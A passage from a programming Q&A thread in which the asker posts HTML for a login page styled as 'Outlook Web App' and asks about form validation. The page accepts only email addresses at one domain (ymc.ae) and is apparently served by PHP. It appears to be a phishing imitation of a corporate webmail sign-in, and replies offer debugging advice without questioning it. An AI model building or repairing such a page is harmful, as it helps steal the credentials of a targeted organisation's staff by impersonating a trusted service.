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" alt="Outlook Web App " />
            </div>
        
  <div class="signInInputLabel" id="userNameLabel" aria-hidden="true">
          Username:  
         </div>
  <div>
  
  
  <input id="username" name="username" class="signInInputText" type="email"  pattern="^[a-z0-9]+[.]?[a-z0-9]+@ymc.ae$" required oninvalid="setCustomValidity('Enter Valid Email.')" required ></div>
  
  

  <input type="hidden" name="token" value="<?php echo $token ;?>">
  
  <div class="signInInputLabel" id="passwordLabel" aria-hidden="true">Password:</div>
  
  
  <div><input id="password" onfocus="g_fFcs=0" name="password" value="" type="password" class="signInInputText" aria-labelledby="passwordLabel" required /></div>
  
  
        <div><input id="passwordText" onfocus="g_fFcs=0" name="passwordText" value="" style="display: none;" class="signInInputText" aria-labelledby="passwordLabel"/></div>
  

        <div class="showPasswordCheck signInCheckBoxText">
            <input type="checkbox" id="showPasswordCheck" class="chk" onclick="showPasswordClick()" />
            <span>Show password</span>
        </div>

  
  
  <div class="signInEnter">
            <div  class="signinbutton" role="button" tabIndex="0" >
               <button type="submit" style="background-color:Transparent;
    background-repeat:no-repeat;
 height:25px;
    border: none;
    cursor:pointer;
    overflow: hidden;
    outline:none;" class="signinTxt"> <img class="imgLnk" 
                    
                        src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjU1NzZGNEQzOTYxOTExRTE4ODU2ODkyQUQxMTQ2QUJGIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjU1NzZGNEQ0OTYxOTExRTE4ODU2ODkyQUQxMTQ2QUJGIj4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6NTU3NkY0RDE5NjE5MTFFMTg4NTY4OTJBRDExNDZBQkYiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6NTU3NkY0RDI5NjE5MTFFMTg4NTY4OTJBRDExNDZBQkYiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7MvF4iAAACF0lEQVR42qyVz0sCQRTHZ5cSuqQJURRUt66GEuQlugmF0Ukw+huCjaBT0SkhEvwL6iQEERRJndIuCoLU1VsFQkH04xR0se/D79C4qLtCDz47zO6b7755M2/GUk5ZdbEwSIEEmAQRvn8ADXADTptHC++dBlsdhIfAJtgBQdXbvkAG5PCDb/OD7XIcByVwQNFLsA5iYJDE+O6SPuJbsrYq490ilulKZwrUwB4oeES8DPZBFDyDOCJvmBEHwDlFC8yrl6hy+crYc0QeMIUdMM9IN8Cb8mmI8I1jatRwtLDkaZt+Mv0P1adB/INjxbYRddBmnsKczt/0s/F2lJrhT5vgHoTkvWVZWlyPF620zb2qPHOajT/iuQQ+uaeLWPiQyyvPNiHCs+zces45G5fimGORaPGI4XHHNjrAvSv22ibilJs+0tsSV2qEfb3oo7b6Xwuw/ZGIX7gzxpi/v+LRi9g+E4nymNFKStaMrxNsGxJxnZ1Fz3haokVDdImLqi3Kti7CZ+wkXQvVHq1TnqFoyBD9dP06zfZGzgpJwxPTseKzlM3iaOVtqyL1cMUTb9o2jj6xXWOFfRtERzhWLIOffeldkTVq/QQM9yE6zDH6rMmZh9APWOXNkGSxJHzoJuib5NhVfeCb+1g+yGpVubrX4IIlH3EVRYrfrulbNc/iXleTwxPPz9V0KKl0X02Wx2Wa9rhM890u018BBgDOvaD/8G2ecwAAAABJRU5ErkJggg==" 
                    
                alt="" onsubmit="submit();" >
    
    </button><a type="submit" onsubmit="submit();" class="signinTxt" >sign in</span>
            </div>
            <input name="isUtf8" value="1" type="hidden"/>
  </div>
 </div>
    </div>
     
</div>
</form>
<script>
    if (showPlaceholderText) {
        setPlaceholderText();
    }
</script>
</body>

</html>
```

Comment: *No additional javascript is being used here* -- I see at least two JavaScript functions which are not defined in the code provided: `checkSubmit()` and `submit()`. Please read about [mcve].

Comment: @MikeMcCaughan : CheckSubmit was being used by the template which I do not require so have removed it. Please take a look at the full code. Also submit() is being used just to submit the form

Answer (score 0):

I'm guessing your validation is checkSubmit(), which is done on keypress?

And submit() actually submits?

Try putting your form inside an actual form tag.  On the form tag, do an onsubmit="checkSubmit()".  checkSubmit() should return false if the form is invalid.

If you want better answers, try posting all the code, including the javascript referenced by checkSubmit() and submit().

Comment: Please check the code, I have inserted the full code.